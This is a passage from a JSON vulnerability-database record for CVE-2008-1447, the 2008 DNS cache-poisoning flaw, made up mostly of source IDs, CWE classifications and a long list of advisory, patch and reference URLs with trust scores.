          {
            "db": "PACKETSTORM",
            "id": "69021"
          },
          {
            "db": "PACKETSTORM",
            "id": "68037"
          },
          {
            "db": "PACKETSTORM",
            "id": "68546"
          },
          {
            "db": "PACKETSTORM",
            "id": "58035"
          },
          {
            "db": "PACKETSTORM",
            "id": "68924"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-1447"
          }
        ]
      },
      "id": "VAR-200707-0675",
      "iot": {
        "_id": null,
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-31572"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2026-04-10T22:49:38.575000Z",
      "problemtype_data": {
        "_id": null,
        "data": [
          {
            "problemtype": "CWE-331",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-310",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-31572"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-1447"
          }
        ]
      },
      "references": {
        "_id": null,
        "data": [
          {
            "trust": 1.1,
            "url": "http://www.ibm.com/support/docview.wss?uid=isg1iz26667"
          },
          {
            "trust": 1.1,
            "url": "http://www.ibm.com/support/docview.wss?uid=isg1iz26668"
          },
          {
            "trust": 1.1,
            "url": "http://www.ibm.com/support/docview.wss?uid=isg1iz26669"
          },
          {
            "trust": 1.1,
            "url": "http://www.ibm.com/support/docview.wss?uid=isg1iz26670"
          },
          {
            "trust": 1.1,
            "url": "http://www.ibm.com/support/docview.wss?uid=isg1iz26671"
          },
          {
            "trust": 1.1,
            "url": "http://www.ibm.com/support/docview.wss?uid=isg1iz26672"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce//2008/jul/msg00003.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce//2008/sep/msg00003.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce//2008/sep/msg00004.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.apple.com/archives/security-announce//2008/sep/msg00005.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/bid/30131"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/495289/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.securityfocus.com/archive/1/495869/100/0/threaded"
          },
          {
            "trust": 1.1,
            "url": "http://www.us-cert.gov/cas/techalerts/ta08-190a.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.us-cert.gov/cas/techalerts/ta08-190b.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.us-cert.gov/cas/techalerts/ta08-260a.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.kb.cert.org/vuls/id/800113"
          },
          {
            "trust": 1.1,
            "url": "http://www.cisco.com/en/us/products/products_security_advisory09186a00809c2168.shtml"
          },
          {
            "trust": 1.1,
            "url": "http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=494401"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht3026"
          },
          {
            "trust": 1.1,
            "url": "http://support.apple.com/kb/ht3129"
          },
          {
            "trust": 1.1,
            "url": "http://support.citrix.com/article/ctx117991"
          },
          {
            "trust": 1.1,
            "url": "http://support.citrix.com/article/ctx118183"
          },
          {
            "trust": 1.1,
            "url": "http://up2date.astaro.com/2008/08/up2date_7202_released.html"
          },
          {
            "trust": 1.1,
            "url": "http://wiki.rpath.com/wiki/advisories:rpsa-2008-0231"
          },
          {
            "trust": 1.1,
            "url": "http://wiki.rpath.com/wiki/advisories:rpsa-2010-0018"
          },
          {
            "trust": 1.1,
            "url": "http://www.bluecoat.com/support/security-advisories/dns_cache_poisoning"
          },
          {
            "trust": 1.1,
            "url": "http://www.isc.org/index.pl?/sw/bind/bind-security.php"
          },
          {
            "trust": 1.1,
            "url": "http://www.kb.cert.org/vuls/id/mimg-7dwr4j"
          },
          {
            "trust": 1.1,
            "url": "http://www.kb.cert.org/vuls/id/mimg-7ecl8q"
          },
          {
            "trust": 1.1,
            "url": "http://www.novell.com/support/viewcontent.do?externalid=7000912"
          },
          {
            "trust": 1.1,
            "url": "http://www.phys.uu.nl/~rombouts/pdnsd.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.phys.uu.nl/~rombouts/pdnsd/changelog"
          },
          {
            "trust": 1.1,
            "url": "http://www.rtpro.yamaha.co.jp/rt/faq/security/vu800113.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/"
          },
          {
            "trust": 1.1,
            "url": "http://www.vmware.com/security/advisories/vmsa-2008-0014.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2008/dsa-1603"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2008/dsa-1604"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2008/dsa-1605"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2008/dsa-1619"
          },
          {
            "trust": 1.1,
            "url": "http://www.debian.org/security/2008/dsa-1623"
          },
          {
            "trust": 1.1,
            "url": "https://www.exploit-db.com/exploits/6122"
          },
          {
            "trust": 1.1,
            "url": "https://www.exploit-db.com/exploits/6123"
          },
          {
            "trust": 1.1,
            "url": "https://www.exploit-db.com/exploits/6130"
          },
          {
            "trust": 1.1,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-july/msg00402.html"
          },
          {
            "trust": 1.1,
            "url": "https://www.redhat.com/archives/fedora-package-announce/2008-july/msg00458.html"
          },
          {
            "trust": 1.1,
            "url": "http://security.freebsd.org/advisories/freebsd-sa-08:06.bind.asc"
          },
          {
            "trust": 1.1,
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2008-august/064118.html"
          },
          {
            "trust": 1.1,
            "url": "http://security.gentoo.org/glsa/glsa-200807-08.xml"
          },
          {
            "trust": 1.1,
            "url": "http://security.gentoo.org/glsa/glsa-200812-17.xml"
          },
          {
            "trust": 1.1,
            "url": "http://security.gentoo.org/glsa/glsa-201209-25.xml"
          },
          {
            "trust": 1.1,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01662368"
          },
          {
            "trust": 1.1,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01523520"
          },
          {
            "trust": 1.1,
            "url": "http://www.mandriva.com/security/advisories?name=mdvsa-2008:139"
          },
          {
            "trust": 1.1,
            "url": "http://blog.invisibledenizen.org/2008/07/kaminskys-dns-issue-accidentally-leaked.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.caughq.org/exploits/cau-ex-2008-0002.txt"
          },
          {
            "trust": 1.1,
            "url": "http://www.caughq.org/exploits/cau-ex-2008-0003.txt"
          },
          {
            "trust": 1.1,
            "url": "http://www.doxpara.com/?p=1176"
          },
          {
            "trust": 1.1,
            "url": "http://www.doxpara.com/dmk_bo2k8.ppt"
          },
          {
            "trust": 1.1,
            "url": "http://www.nominum.com/asset_upload_file741_2661.pdf"
          },
          {
            "trust": 1.1,
            "url": "http://www.unixwiz.net/techtips/iguide-kaminsky-dns-vuln.html"
          },
          {
            "trust": 1.1,
            "url": "https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-037"
          },
          {
            "trust": 1.1,
            "url": "ftp://ftp.netbsd.org/pub/netbsd/security/advisories/netbsd-sa2008-009.txt.asc"
          },
          {
            "trust": 1.1,
            "url": "http://www.openbsd.org/errata42.html#013_bind"
          },
          {
            "trust": 1.1,
            "url": "http://www.openbsd.org/errata43.html#004_bind"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a12117"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a5725"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a5761"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a5917"
          },
          {
            "trust": 1.1,
            "url": "https://oval.cisecurity.org/repository/search/definition/oval%3aorg.mitre.oval%3adef%3a9627"
          },
          {
            "trust": 1.1,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0533.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.redhat.com/support/errata/rhsa-2008-0789.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020437"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020438"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020440"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020448"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020449"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020548"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020558"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020560"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020561"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020575"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020576"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020577"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020578"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020579"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020651"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020653"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020702"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020802"
          },
          {
            "trust": 1.1,
            "url": "http://www.securitytracker.com/id?1020804"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30925"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30973"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30977"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30979"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30980"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30988"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30989"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/30998"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31011"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31012"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31014"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31019"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31022"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31030"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31031"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31033"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31052"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31065"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31072"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31093"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31094"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31137"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31143"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31151"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31152"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31153"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31169"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31197"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31199"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31204"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31207"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31209"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31212"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31213"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31221"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31236"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31237"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31254"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31326"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31354"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31422"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31430"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31451"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31482"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31495"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31588"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31687"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31823"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31882"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/31900"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/33178"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/33714"
          },
          {
            "trust": 1.1,
            "url": "http://secunia.com/advisories/33786"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-239392-1"
          },
          {
            "trust": 1.1,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-240048-1"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2008-07/msg00003.html"
          },
          {
            "trust": 1.1,
            "url": "http://lists.opensuse.org/opensuse-security-announce/2008-08/msg00006.html"
          },
          {
            "trust": 1.1,
            "url": "http://www.ubuntu.com/usn/usn-622-1"
          },
          {
            "trust": 1.1,
            "url": "http://www.ubuntu.com/usn/usn-627-1"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2019/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2023/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2025/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2029/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2030/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2050/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2051/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2052/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2055/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2092/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2113/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2114/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2123/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2139/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2166/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2195/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2196/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2197/references"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2268"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2291"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2334"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2342"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2377"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2383"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2384"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2466"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2467"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2482"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2525"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2549"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2558"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2582"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2008/2584"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2009/0297"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2009/0311"
          },
          {
            "trust": 1.1,
            "url": "http://www.vupen.com/english/advisories/2010/0622"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/43637"
          },
          {
            "trust": 1.1,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/43334"
          },
          {
            "trust": 1.0,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-1447"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=121866517322103\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=123324863916385\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://www.ipcop.org/index.php?name=news\u0026file=article\u0026sid=40"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2008\u0026m=slackware-security.539239"
          },
          {
            "trust": 1.0,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=762152"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=141879471518471\u0026w=2"
          },
          {
            "trust": 1.0,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026y=2008\u0026m=slackware-security.452680"
          },
          {
            "trust": 1.0,
            "url": "http://marc.info/?l=bugtraq\u0026m=121630706004256\u0026w=2"
          },
          {
            "trust": 0.9,
            "url": "http://secunia.com/advisories/26195/"
          },
          {
            "trust": 0.8,
            "url": "http://csrc.nist.gov/publications/nistpubs/800-81/sp800-81.pdf"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/draft-ietf-dnsext-forgery-resilience"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc3833"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc2827"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc3704"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc3013"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc4033"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/draft-ietf-tsvwg-port-randomization"
          },
          {
            "trust": 0.8,
            "url": "http://cr.yp.to/djbdns/dns_random.html"
          },
          {
            "trust": 0.8,
            "url": "http://cr.yp.to/djbdns/dns_transmit.html"
          },
          {
            "trust": 0.8,
            "url": "http://cr.yp.to/djbdns/forgery.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.trusteer.com/microsoftdns"
          },
          {
            "trust": 0.8,
            "url": "http://www.trusteer.com/bind9dns"
          },
          {
            "trust": 0.8,
            "url": "http://www.trusteer.com/bind8dns"
          },
          {
            "trust": 0.8,
            "url": "http://www.sans.org/reading_room/whitepapers/dns/1567.php"
          },
          {
            "trust": 0.8,
            "url": "http://blogs.iss.net/archive/morednsnat.html"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/cert/jvnvu800113/"
          },
          {
            "trust": 0.8,
            "url": "http://www.cert.at/static/cert.at-0802-dns-patchanalysis.pdf"
          },
          {
            "trust": 0.8,
            "url": "http://www.isc.org/sw/bind/bind-security.php"
          },
          {
            "trust": 0.8,
            "url": "http://www.trusteer.com/docs/bind9dns.html"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnvu%23252735/index.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.milw0rm.com/exploits/4266"
          },
          {
            "trust": 0.8,
            "url": "http://docs.info.apple.com/article.html?artnum=307041"
          },
          {
            "trust": 0.4,
            "url": "http://secunia.com/"
          },
          {
            "trust": 0.4,
            "url": "http://lists.grok.org.uk/full-disclosure-charter.html"
          },
          {
            "trust": 0.3,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-1447"
          },
          {
            "trust": 0.3,
            "url": "http://packages.debian.org/\u003cpkg\u003e"
          },
          {
            "trust": 0.3,
            "url": "http://security.debian.org/"
          },
          {
            "trust": 0.3,
            "url": "http://www.debian.org/security/faq"
          },
          {
            "trust": 0.3,
            "url": "http://www.debian.org/security/"
          },
          {
            "trust": 0.2,
            "url": "http://www.itrc.hp.com/service/cki/secbullarchive.do"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/driveralertprofile.php?regioncode=na\u0026langcode=useng\u0026jumpid=in_sc-gen__driveritrc\u0026topiccode=itrc"
          },
          {
            "trust": 0.2,
            "url": "https://www.hp.com/go/swa"
          },
          {
            "trust": 0.2,
            "url": "http://h30046.www3.hp.com/subsignin.php"
          },
          {
            "trust": 0.1,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026amp;id=762152"
          },
          {
            "trust": 0.1,
            "url": "http://www.ipcop.org/index.php?name=news\u0026amp;file=article\u0026amp;sid=40"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=123324863916385\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=141879471518471\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=121866517322103\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "http://marc.info/?l=bugtraq\u0026amp;m=121630706004256\u0026amp;w=2"
          },
          {
            "trust": 0.1,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2008\u0026amp;m=slackware-security.539239"
          },
          {
            "trust": 0.1,
            "url": "http://slackware.com/security/viewer.php?l=slackware-security\u0026amp;y=2008\u0026amp;m=slackware-security.452680"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml."
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/en/us/products/products_security_vulnerability_policy.html."
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/go/psirt"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/web/about/security/intelligence/dns-bcp.html."
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/en/us/products/prod_warranties_item09186a008088e31f.html,"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/pcgi-bin/software/tablebuild/tablebuild.pl/nr-eval"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/pcgi-bin/tablebuild.pl/acns55"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com."
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/go/psirt."
          },
          {
            "trust": 0.1,
            "url": "https://www.example.com"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/warp/public/687/directory/dirtac.shtml"
          },
          {
            "trust": 0.1,
            "url": "http://www.cisco.com/public/sw-center/sw-usingswc.shtml."
          },
          {
            "trust": 0.1,
            "url": "http://intellishield.cisco.com/security/alertmanager/cvss"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/"
          },
          {
            "trust": 0.1,
            "url": "http://www.mandriva.com/security/advisories"
          },
          {
            "trust": 0.1,
            "url": "http://bugs.gentoo.org."
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2008-4194"
          },
          {
            "trust": 0.1,
            "url": "http://creativecommons.org/licenses/by-sa/2.5"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/glsa/glsa-200901-03.xml"
          },
          {
            "trust": 0.1,
            "url": "http://security.gentoo.org/"
          },
          {
            "trust": 0.1,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-4194"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_arm.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_s390.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mipsel.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_hppa.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_mips.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35.orig.tar.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4_ia64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.debian.org/pool/updates/main/d/dnsmasq/dnsmasq_2.35-1+etch4.dsc"
          },
          {
            "trust": 0.1,
            "url": "http://software.hp.com"
          },
          {
            "trust": 0.1,
            "url": "http://itrc.hp.com"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-30_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libisccc0_9.3.2-2ubuntu1.5_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9-host_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-p1-3ubuntu2_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/liblwres9_9.3.4-2ubuntu2.3_i386.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind9-0_9.3.2-2ubuntu1.5_amd64.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/dnsutils_9.3.4-2ubuntu2.3_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/libbind-dev_9.4.1-p1-3ubuntu2_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://ports.ubuntu.com/pool/main/b/bind9/libbind-dev_9.4.2-10ubuntu0.1_sparc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.3.2-2ubuntu1.5_powerpc.deb"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/main/b/bind9/bind9_9.3.4-2ubuntu2.3.diff.gz"
          },
          {
            "trust": 0.1,
            "url": "http://security.ubuntu.com/ubuntu/pool/universe/b/bind9/lwresd_9.4.1-p1-3ubuntu2_amd64.deb"
          },
          {
            "trust": 0.1,
